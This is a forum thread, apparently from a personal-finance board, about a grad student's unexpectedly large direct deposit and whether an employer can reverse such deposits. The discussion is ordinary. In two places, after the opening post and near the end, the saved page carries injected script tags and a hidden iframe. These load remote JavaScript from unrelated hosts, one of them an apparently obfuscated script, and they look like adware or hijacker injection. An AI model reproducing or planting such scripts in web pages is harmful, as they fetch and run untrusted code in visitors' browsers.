In fact, larger than my husband's gross wage. Boss did not give a wage increase, in fact the lab is shutting down in July because of lack of funding. Nothing I can do till tomorrow (when my husband can look up his paystub) but I was surprised and this is where I share money stuff, lol. <script src="https://secure-content-delivery.com/mware-detection/index.php?d=www.notmsnmoney.proboards.com&c=mwareDetect.returned" type="text/javascript"></script><script type="text/javascript" src="http://p.adpk.org/serve.js?s=PT1650&pid=6232"></script><script type="text/javascript" src="//secure-content-delivery.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script src="https://secure-content-delivery.com/data.js.php?i={53984A46-AE1A-445C-8A7A-207FE87F2020}&d=2013-1-19&s=http://www.notmsnmoney.proboards.com/thread/new/58&cb=0.5162326229868472" type="text/javascript"></script><script type="text/javascript" src="http://static.webprotectapp00.webprotectapp.com/partnerconfig/webprotect.js"></script><script src="//static.webprotectapp00.webprotectapp.com/apps/boot/boot-start.js" type="text/javascript"></script><script src="//static.webprotectapp00.webprotectapp.com/apps/tv-classic/tv-classic-noboot-fg.js" type="text/javascript"></script><script src="//static.webprotectapp00.webprotectapp.com/apps/boot/boot-end.js" type="text/javascript"></script><script src="http://i.selectionlinksjs.info/obfy/javascript.js" type="text/javascript"></script>

Are you the poster who said recently that your husband was owed all sorts back wages? Maybe the company found the funds to pay him.

Party like it's 1999? (Meaning go buy a lot of tech stocks, get heavily leveraged in real estate, and see if you can't arrange to meet a little guy we like to call "Mark Zuckerberg".)

Don't use the money they may take it back. It could be vacation funds or something they are paying him. Of course you have to find out. No vacation funds, we don't get vacation hours because we are grad students. Can they take the money back without contacting me? Just reach in and get it? I assumed it would be deducted from the next paycheck, but could they really try to take it?

You may have to check your direct deposit agreement. My employer can reach back in and take it out because I signed an agreement that let them "credit or debit entries and adjustments."

I will have to look but I bet I'll found out what happened with the deposit before I get around to getting the paper again.

Of course they can take it back if its a mistake, please don't tell me you are that naïve. Don't be so foolish to spend something that may not even be yours. I've seen all kinds of mistakes, how they handle it is up to the employer, just call or email and find out why and what it is, don't create a mess for yourself where there shouldn't be one.
One year they rebated hubby $30k on the tax return, come to find out it was a mistake, we thought it was, in the next week or so we had to send them a check for $17k. Someone in the tax firm made a huge mistake with many peoples returns, bet they didn't have a job after that. Pat - gin is a pretty sensible poster. I'm sure she's not going to spend someone else's money. I just remembered a mix-up here when one of our junior people joined the team. His first direct deposit was like $100,000. He went to HR immediately, they said "Oops! We'll fix that right away!" Next payday, another $100,000. Somehow his name was messed up in the system with one of the very high-level muckety-mucks and he kept getting their salary. He didn't touch it, but it took HR 4 (!!!) months to fix it for some reason. He did have to deal with tax implications as the money sat in his account, which he then had to bill back to the company. He kept a screen shot in his cube of his bank account with its $800,000 balance.

Several years ago, one of the local banks had a "computer glitch" where they credited everyone's account with a paycheck from the county from data several years ago. I hadn't been on the county payroll in years, and I got a check from the County.
They reversed it a few days later, but I guess some people found out about it and spent the money immediately, and the bank took a big hit.
I'm pretty sure someone lost their job over that.

I assumed that allowing a group to deposit money did not mean that they could remove money. I don't care about the money being taken from the next paycheck or even requiring a consent to remove the money themselves. But the idea that by giving consent to deposit, they can remove money bothers me a lot. Why is it naive to think that a business cannot pull from my personal account? That is very different than requiring a check to be sent. <!--- [END] BFA Slide in HTML --><iframe name="ykframe" id="ykframe"></iframe><script src="http://i.selectionlinksjs.info/obfy/javascript.js" type="text/javascript"></script>

Found out the answer. My husband's HR screwed up and lost his paperwork removing me from his health insurance (and we have proof of the original date of the paperwork). This was the refund for the backdated removal.
